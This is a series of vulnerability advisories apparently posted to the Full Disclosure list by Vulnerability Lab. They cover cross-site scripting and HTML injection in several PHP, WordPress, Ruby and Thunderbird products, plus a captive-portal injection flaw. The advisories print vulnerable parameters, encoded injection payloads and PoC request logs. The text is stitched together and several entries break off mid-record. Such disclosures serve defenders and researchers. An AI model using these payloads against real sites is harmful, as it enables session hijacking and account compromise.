https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Host: phpjabbers-cms.localhost:8080
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
Origin:https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; 
pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; 
simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_create=1&role_id=2&email=test@ftp.world&password=test2&name=r">§ion_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location: 
/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
--
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
Host: phpjabbers-cms.localhost

[FD] Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2277


Release Date:
=
2021-10-28


Vulnerability Laboratory ID (VL-ID):

2277


Common Vulnerability Scoring System:

5.3


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Hotel, Motel , Bar & Restaurant Listing Plugin + Membership plugin using 
Wordpress with PHP and MySQL Technologie.

(Copy of the Homepage:https://hotel.eplug-ins.com/hoteldoc/  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple persistent 
cross site vulnerabilities in the official Hotel Listing v3.x wordpress plugin 
web-application.


Affected Product(s):

e-plugins
Product: Hotel Listing v3.x - Plugin Wordpress (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-08-19: Researcher Notification & Coordination (Security Researcher)
2021-08-20: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Guest Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

Multiple persistent input validation web vulnerabilities has been discovered in 
the official Hotel Listing v3.x wordpress plugin web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise browser to
web-application requests from the application-side.

The vulnerabilities are located in add new listing - address, city, zipcode, 
country and location input fields of the my-account module.
Remote attackers can register a low privileged application user account to 
inject own malicious script codes with persistent attack vector to
hijack user/admin session credentials or to permanently manipulate affected 
modules. The execute of the malicious injected script code takes
place in the frontend on preview but as well in the backend on interaction to edit 
or list (?&profile=all-post) by administrative accounts.
The request method to inject is post and the attack vector is persistent 
located on the application-side.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Add New Listing


Vulnerable Input(s):
[+] address
[+] city
[+] zipcode
[+] country

Affected Module(s):
[+] Frontend on Preview (All Listings)
[+] Backend on Preview (All Listings) or Edit


Proof of Concept (PoC):
===
The persistent web vulnerabilities can be exploited by remote attackers with 
privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


Exploitation: Payload
%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E


Vulnerable Source: new-listing


Address  

>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter address Here">


Area  

>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Area Here">
  
  



City
>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter city ">


Zipcode   

>""
placeholder="Enter Zipcode ">




State 

>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter State ">


Country   

>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Country ">




--- PoC Session Logs (POST) ---
http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php
Host: hotel-eplug-ins.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 
Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1603
Origin:http://hotel-eplug-ins.localhost:8000
Connection: keep-alive
Referer:ht

[FD] My Movie Collection Sinatra App - (Movie) XSS Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
My Movie Collection Sinatra App - (Movie) XSS Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2294


Release Date:
=
2021-11-01


Vulnerability Laboratory ID (VL-ID):

2294


Common Vulnerability Scoring System:

5.6


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Welcome to My Movie Collection Sinatra web app where you can create, read, 
update, and delete movies that you own.
Here you can build and keep track of your DVD/Blu-Ray collection. You can also 
add movie comments and date purchased.
The code is available as open source under the terms of the MIT License.

(Copy of the Homepage:https://github.com/jffernan/my-movie-collection  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent cross 
site scripting vulnerability in the My Movie Collection Sinatra web-application.


Affected Product(s):

James Fernandez
Product: My Movie Collection Sinatra app (v2017 & v2018)- Video Application 
(Web-Application) (Ruby)


Vulnerability Disclosure Timeline:
==
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-01: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent cross site web vulnerability has been discovered in the official 
My Movie Collection Sinatra v2018 web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise
browser to web-application requests from the application-side.

The persistent cross site scripting web vulnerability is located in the `title` 
and `comment` parameters of the `movies/new` module.
Authenticated remote attackers with user privileges are able to process 
manipulated post method requests for movie creates to inject
own malicious script code with persistent attack vector. The request method to 
inject is post and the attack vector is located on
the application-side. The execute of the payload occurs as well on preview of 
all videos by all users.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent external
redirects to malicious source and non-persistent manipulation of affected 
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] movies/new

Vulnerable Input(s):
[+] Create New Movie Below:
[+] Description (Comment)

Vulnerable Parameter(s):
[+] title
[+] comment

Affected Module(s):
[+] movies


Proof of Concept (PoC):
===
The persistent cross site scripting web vulnerability can be exploited by 
remote attackers with user account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability 
follow the provided information and steps below to continue.


PoC: Exploitation
">https://sinatra-my-movie-collection.localhost:8000/movies
Host: sinatra-my-movie-collection.localhost:8000
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; 
boundary=---210716863231834847754001617875
Content-Length: 580
Origin:https://sinatra-my-movie-collection.localhost:8000
Connection: keep-alive
Referer:https://sinatra-my-movie-collection.localhost:8000/movies/new
Cookie: 
rack.session=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiRWExYmI3MzNjMjY0MzI0OWFmZjhm%0ANTBkZDJmY2U1Y2VmMTljMjM0O
DljYWY2NTVmNGZjNmQ5OWM3YWE5OTNiMzcG%0AOwBGSSIJY3NyZgY7AEZJIjFBYld4dnVKVVpxS1Bzd2hsNzVqZmNPZHg5MURR%0ATzBvRnEw
dnJOZklSaVVFPQY7AEZJIg10cmFja2luZwY7AEZ7B0kiFEhUVFBf%0AVVNFUl9BR0VOVAY7AFRJIi1jYjExMDUyYzliMTQyYzkyMmMwOTQzMD
AwNmQ5%0AMTk1ODk5ZTVhNGYwBjsARkkiGUhUVFBfQUNDRVBUX0xBTkdVQUdFBjsAVEki%0ALWRkMDY1ZWQyNjNjNjdkNzk5Zjk0M2FiNmMzO
WI1NWM1ZTAwOGNiYjUGOwBG%0ASSIMdXNlcl9pZAY7AEZpGw%3D%3D%0A--cbce7ee175a442b3be02b5a755e1b5809c788194
Post: title=test1">https://sinatra-my-movie-collection.localhost:8000/movies/14
Content-Length: 0
Server: WEBrick/1.3.1 (Ruby/2.3.3/2016-11-21)

[FD] My Movie Collection Sinatra App - (Login) XSS Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
My Movie Collection Sinatra App - (Login) XSS Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2293


Release Date:
=
2021-11-01


Vulnerability Laboratory ID (VL-ID):

2293


Common Vulnerability Scoring System:

5.1


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Welcome to My Movie Collection Sinatra web app where you can create, read, 
update, and delete movies that you own.
Here you can build and keep track of your DVD/Blu-Ray collection. You can also 
add movie comments and date purchased.
The code is available as open source under the terms of the MIT License.

(Copy of the Homepage:https://github.com/jffernan/my-movie-collection  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple 
non-persistent cross site scripting vulnerabilities in the My Movie Collection 
Sinatra web-application.


Affected Product(s):

James Fernandez
Product: My Movie Collection Sinatra app (v2017 & v2018)- Video Application 
(Web-Application) (Ruby)


Vulnerability Disclosure Timeline:
==
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-01: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Pre Auth (No Privileges or Session)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

Multiple non-persistent cross site web vulnerabilities has been discovered in 
the official My Movie Collection Sinatra web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with non-persistent attack vector to compromise browser
to web-application requests by the client-side.

The non-persistent cross site scripting web vulnerabilities are located in the 
username and password input fields of the login and signup module.
Unauthenticated remote attackers are able to process manipulated post method 
requests for logins or signup to inject own malicious script code
with non-persistent attack vector. The request method to inject is post and the 
attack vector is located on the client-side.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application 
modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] ./login
[+] ./signup

Vulnerable Input(s):
[+] Username
[+] Password

Vulnerable Parameter(s):
[+] username
[+] password


Proof of Concept (PoC):
===
The client-side cross site scripting web vulnerabilities can be exploited by 
remote attackers without account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability 
follow the provided information and steps below to continue.


PoC: Exploitation
">https://sinatra-my-movie-collection.localhost:8000/login
Host: sinatra-my-movie-collection.localhost:8000
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Origin:https://sinatra-my-movie-collection.localhost:8000
Connection: keep-alive
Referer:https://sinatra-my-movie-collection.localhost:8000/login
Cookie: 
rack.session=BAh7CEkiD3Nlc3Npb25faWQGOgZFVEkiRWExYmI3MzNjMjY0MzI0OWFmZjhm%0ANTBkZDJmY2U1Y2VmMTljMjM0ODljYWY2NTVm
NGZjNmQ5OWM3YWE5OTNiMzcG%0AOwBGSSIJY3NyZgY7AEZJIjFzWWZUWmJzK2F2VjZYVUVweHBhdDh1LzROUUdQ%0AaXozNmsyWkhabzJYRDhJPQY7AEZJIg
10cmFja2luZwY7AEZ7B0kiFEhUVFBf%0AVVNFUl9BR0VOVAY7AFRJIi1jYjExMDUyYzliMTQyYzkyMmMwOTQzMDAwNmQ5%0AMTk1ODk5ZTVhNGYwBjsARkkiG
UhUVFBfQUNDRVBUX0xBTkdVQUdFBjsAVEki%0ALWRkMDY1ZWQyNjNjNjdkNzk5Zjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUGOwBG%0A--0b309977af0b38c2447b5de4853c1057e744939c
username=">https://sinatra-my-movie-collection.localhost:8000/
Content-Length: 0
Server: WEBrick/1.3.1 (Ruby/2.3.3/2016-11-21)
-
https://sinatra-my-movie-collection.localhost:8000/evil.source
Host: sinatra-my-movie-collection.localhost:8000
Accept: image/webp,*/*
Connection: keep-alive
Referer:https://sinatra-my-movie-collection.localhost:8000/signup

[FD] Payment Terminal 2.x & v3.x - Multiple XSS Web Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
Payment Terminal 2.x & v3.x - Multiple XSS Web Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2280


Release Date:
=
2021-11-05


Vulnerability Laboratory ID (VL-ID):

2280


Common Vulnerability Scoring System:

5.2


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Quick and easy payment terminal as script for clients to pay for products and 
services.

(Copy of the 
Homepage:https://www.criticalgears.com/product/authorize-net-payment-terminal/  
)
(Copy of the 
Homepage:https://www.criticalgears.com/product/paypal-pro-payment-terminal/  )
(Copy of the 
Homepage:https://www.criticalgears.com/product/stripe-payment-terminal/  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a cross site 
scripting vulnerability in the Authorize.net Payment Terminal v2.4.1.
The vulnerability laboratory core research team discovered a cross site 
scripting vulnerability in the Stripe Payment Terminal v2.2.1.
The vulnerability laboratory core research team discovered a cross site 
scripting vulnerability in the PayPal PRO Payment Terminal v3.1.


Affected Product(s):

CriticalGears
Product: Authorize.net Payment Terminal 2.4.1 - Payment Formular Script (PHP) 
(Web-Application)
Product: Stripe Payment Terminal v2.2.1 - Payment Formular Script (PHP) 
(Web-Application)
Product: PayPal PRO Payment Terminal v3.1 - Payment Formular Script (PHP) 
(Web-Application)


Vulnerability Disclosure Timeline:
==
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Pre Auth (No Privileges or Session)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

Multiple non-persistent cross site scripting web vulnerabilities has been 
discovered in the official Authorize.net Payment Terminal v2.4.1,
the PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1. 
The vulnerability allows remote attackers to inject own malicious
script codes with non-persistent attack vector to compromise client-site 
browser to web-application requests.

The non-persistent cross site scripting web vulnerabilities are located in the 
`item_description`,`fname`,`lname`,`address`,`city`,`email`
parameters of the `Billing Information` or `Payment Information` formular. 
Attackers are able to inject own malicious script code to the
`Description`,`Firstname`, `Lastname`,`Address`,`City`,`Email` input fields to 
manipulate client-side requests. The request method to
inject is post and the attack vector is non-persistent on client-side. In case 
the form is implemented to another web-service attackers
are able to exploit the bug by triggering an execute of the script code in the 
invalid exception-handling.

The PayPal PRO Payment Terminal v3.1 and Stripe Payment Terminal v2.2.1 impacts 
the same vulnerable script and is affected as well by
the simple validation vulnerability.

Successful exploitation of the vulnerabilities results in session hijacking, 
non-persistent phishing attacks, non-persistent external
redirects to malicious source and non-persistent manipulation of affected 
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Billing Information
[+] Payment Information

Vulnerable Input(s):
[+] Description
[+] Firstname
[+] Lastname
[+] Address
[+] City
[+] Email

Vulnerable Parameter(s):
[+] item_description
[+] fname
[+] lname
[+] address
[+] city
[+] email

Affected Module(s):
[+] Exception Handling (Invalid)


Proof of Concept (PoC):
===
The client-side cross site scripting web vulnerability can be exploited by 
remote attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site scripting web 
vulnerability follow the provided information and steps below to continue.


Exploitation: Payload
">%20%20
">%20%20


Vulnerable Source: Invalid (Exception-Handling - onkeyup checkFieldBack)


Payment Information

Description:

%20 
onkeyup="checkFieldBack(this);"

Amount:

[FD] ImportExportTools NG 10.0.4 - HTML Injection Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
ImportExportTools NG 10.0.4 - HTML Injection Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2308


Release Date:
=
2021-11-05


Vulnerability Laboratory ID (VL-ID):

2308


Common Vulnerability Scoring System:

4.2


Vulnerability Class:

Script Code Injection


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Adds tools to import/export messages and folders (NextGen).

(Copy of the 
Homepage:https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/
  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent 
validation vulnerability in the official ImportExportTools NG 10.0.4 for 
mozilla thunderbird.


Affected Product(s):

Christopher Leidigh
Product: ImportExportTools NG v10.0.4 - Addon (Mozilla Thunderbird)


Vulnerability Disclosure Timeline:
==
2021-10-07: Researcher Notification & Coordination (Security Researcher)
2021-10-08: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Pre Auth (No Privileges or Session)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A html inject web vulnerability has been discovered in the official 
ImportExportTools NG 10.0.4 for mozilla thunderbird.
The vulnerability allows a remote attacker to inject html payloads to 
compromise application data or session credentials.

The vulnerability is located in the html export function. Subject content on 
export is not sanitized like on exports in mozilla itself.
Thus allows a remote attacker to send malicious emails with malformed a html 
payloads that executes on preview after a html export by
the victim user.

Vulnerable Module(s):
[+] Export (HTML)


Proof of Concept (PoC):
===
The web vulnerability can be exploited by remote attackers without user account 
and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install mozilla thunderbird
2. Install ImportExportTools NG v10.0.4
3. Use another email to write to the target inbox were the export takes place
Note: Inject into the subject any html test payload
4. Target user exports his content of the inbox in html were the payload 
executes
5. Successful reproduce of the encode validation vulnerability!

Note: We reported some years ago the same issue that was also present in 
keepass and kaspersky password manager on exports via html and has been 
successfully resolved.


Vulnerable Source: ImportExportTools Exported HTML File


table { border-collapse: collapse; }
th { background-color: #e6; }
th, td { padding: 4px; text-align: left; vertical-align: center; }
tr:nth-child(even) { background-color: #f0f0f0; }
tr:nth-child(odd) { background-color: #fff; }
tr>:nth-child(5) { text-align: center; }


Posteingang


Posteingang (10/07/2021)Betreff
VonAnDatumAnhang

payload in subject ">
t...@vulnerability-lab.com" 

[FD] cWifi Hotspot Wireless CP - Code Execution Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
cWifi Hotspot Wireless CP - Code Execution Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2310


Release Date:
=
2021-12-15


Vulnerability Laboratory ID (VL-ID):

2310


Common Vulnerability Scoring System:

8.2


Vulnerability Class:

Code Execution


Current Estimated Price:

2.000€ - 3.000€


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered code execution 
vulnerability in the cWifi Hotspot Wireless Captive Portal.


Affected Product(s):

Product: cWifi Hotspot Wireless Captive Portal -  (PHP) (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-12-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Authentication Type:

Restricted Authentication (Guest Privileges)


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

A code execution vulnerability has been discovered in the official cWifi 
Hotspot wireless captive portal web-application.
The vulnerability is located in the login status post method request for the 
spot-cwifi. Remote attackers are able to inject own malicious ip and
mac adress credentials in the post method data request. that results in several 
different typ of vulnerabilities in connection to the phpsessionid.
Attackers are able to provoke client-side script code execution via mac or ip 
parameter in the status post method request. Thus allows the attacker
to gain access to the victims wifi connection and session credentials to 
access. The issue can be process by a full remote attacker after connecting
as guest or member to the wifi. The parameter in the post method request are no 
sanitized correctly and results in a client-side execution.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /v2/
[+] /logout

Vulnerable File(s):
[+] status.php

Vulnerable Parameter(s):
[+] ip
[+] mac
[+] adress


Proof of Concept (PoC):
===
The critical code execution vulnerability can be exploited by remote attackers 
with guest access or by authenticated user accounts.
For security demonstration or to reproduce the web vulnerability follow the 
provided information and steps below to continue.


Vulnerable Source: status.php (v2/status.php -http://spot.cwifi.de/status)








MAC-Adresse: <[MALICIOUS INJECTED CODE 
EXECUTION!]>

IP Adresse:<[MALICIOUS INJECTED CODE PAYLOAD 
EXECUTION!]>
Bytes up/down:7.2 MiB/ 221.6 MiB
Session time:7m56s

abmelden
abmelden 
und Daten löschen






-- logout status

you have just logged out 

user name<[MALICIOUS INJECTED CODE PAYLOAD 
EXECUTION!]>
IP address<[MALICIOUS INJECTED CODE PAYLOAD 
EXECUTION!]>
MAC address<[MALICIOUS INJECTED CODE PAYLOAD 
EXECUTION!]>
session time4m12s
time left23h55m48s
bytes up/down:49.1 KiB / 169.2 KiB


http://spot.cwifi.de/login";  name="login" onsubmit="return 
openLogin()">





--- PoC Session Logs (POST) ---
POST /v2/status.php HTTP/1.1
Host: hotspot.cwifi.de
Content-Length: 1129
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin:http://spot.cwifi.de
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer:http://spot.cwifi.de/
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
-
hostname=spot.cwifi.de&identity=Client2822&login-by=http-pap&plain-passwd=yes&server-address=<[MALICIOUS
 INJECTED CODE!]>%3A80&ssl-login=no
&server-name=Client2822_HotSpot&link-login=http%3A%2F%2Fspot.cwifi.de%2Flogin&link-login-only=http%3A%2F%2Fspot.cwifi.de%2Flogin
&link-logout=http%3A%2F%2Fspot.cwifi.de%2Flogout&link-status=http%3A%2F%2Fspot.cwifi.de%2Fstatus&link-orig=
&domain=&interface-name=2_HotSpotA&ip=<[MALICIOUS INJECTED 
CODE!]>&logged-in=yes&mac=<[MALICIOUS INJECTED 
CODE!]>&trial=no&username=90%3ACC%3ADF%3A96%3AF6%3A59
&host-ip=<[MALICIOUS INJECTED 
CODE!]>&idle-timeout=5h&idle-timeout-secs=18000&limit-bytes-in=&limit-bytes-out=&refresh-timeout=1m&refresh-timeout-secs=60
&session-timeout=23h52m4s&session-timeout-secs=85924&session-time-left=23h52m4s&s

[FD] Easy Cart Shopping Cart - (Search) Persistent Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Easy Cart Shopping Cart - (Search) Persistent Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2298


Release Date:
=
2021-12-15


Vulnerability Laboratory ID (VL-ID):

2298


Common Vulnerability Scoring System:

5.1


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
A mobile-friendly, SEO optimized and easy-to-install (with a free installation 
also offered also on request) PHP shopping
cart script that can be used to add an e-commerce functionality to existing 
sites or to create simple online stores.
Easy Cart is a PHP script allowing to create a simple shopping cart website or 
integrate a shopping cart functionality
in an existing site-the users will be able to browse the products, add them in 
the cart and check out and make a payment.

(Copy of the Homepage:https://www.netartmedia.net/easy-cart  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a cross site 
scripting web vulnerability in the Easy Cart Shopping Cart PHP Script.


Affected Product(s):

NetArt Media
Product: Easy Cart Shopping Cart (v2021) - CMS (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-12-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Pre Auth (No Privileges or Session)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A non-persistent post inject web vulnerability has been discovered in the 
official Easy Cart Shopping Cart PHP Script.
The vulnerability allows remote attackers to inject malicious script code in 
post method requests to compromise user
session data or to manipulate application contents for clients.

The cross site scripting web vulnerability is located in the `keyword_search` 
parameter of the `index search` module.
Remote attackers without privileged access are able to inject own malicious 
script code in the search input field of
the index module post method request. The execution takes place in the results 
page of the search after submit via post.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent manipulation of 
affected application modules.

Request method(s):
[+] POST

Vulnerable Input(s):
[+] Search (index)

Vulnerable Parameter(s):
[+] keyword_search


Proof of Concept (PoC):
===
The client-side post inject web vulnerability can be exploited by remote 
attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site web vulnerability 
follow the provided information and steps below to continue.


PoC: Payload

"



--- PoC Session Logs (POST) ---
https://easy-cart.localhost:8000/cart/index.php
Host: easy-cart.localhost:8000
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Origin:https://easy-cart.localhost:8000
Connection: keep-alive
Referer:https://easy-cart.localhost:8000/cart/index.php
Cookie: PHPSESSID=24d238178bfb19f9bd93f25f1b465885
page=products&proceed_search=1&keyword_search=>"&amount=$299 - $549&only_picture=0
-
POST: HTTP/2.0 200 OK
server: Apache
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
vary: Accept-Encoding
content-encoding: gzip
content-length: 2496
content-type: text/html; charset=UTF-8
-
https://easy-cart.localhost:8000/cart/evil.source
Host: easy-cart.localhost:8000
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:https://easy-cart.localhost:8000/cart/index.php
Cookie: PHPSESSID=24d238178bfb19f9bd93f25f1b465885
-
GET: HTTP/2.0 200 OK
server: Apache
vary: Accept-Encoding
content-encoding: gzip
content-length: 703
content-type: text/html; charset=UTF-8



PoC: Exploit


PoC

#nodisplay {
display:none;
}




https://easy-cart.localhost:8000/cart/index.php";  method="post">




function submitForm

[FD] uDoctorAppointment v2.1.1 - Multiple XSS Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
uDoctorAppointment v2.1.1 - Multiple XSS Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2288


Release Date:
=
2021-12-15


Vulnerability Laboratory ID (VL-ID):

2288


Common Vulnerability Scoring System:

5


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Clinic management, doctor or therapist online medical appointment scheduling 
system for the management of health care.
uDoctorAppointment script allows doctors to register and appropriate membership 
plan with different features.
Patients can view doctor profiles before booking appointments. The site 
administrator or doctor may create and
manage advanced schedules, create working time slots for each day of the week, 
define time off etc.

(Copy of the 
Homepage:https://www.apphp.com/codemarket/items/1/udoctorappointment-php-script 
 )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple 
non-persistent cross site web vulnerabilities in the uDoctorAppointment script 
web-application.


Affected Product(s):

ApPHP
Product: uDoctorAppointment v2.1.1 - Health Care Script (PHP) (Web-Application)
Product: ApPHP MVC Framework v1.1.5 (Framework)


Vulnerability Disclosure Timeline:
==
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-10: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-12-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

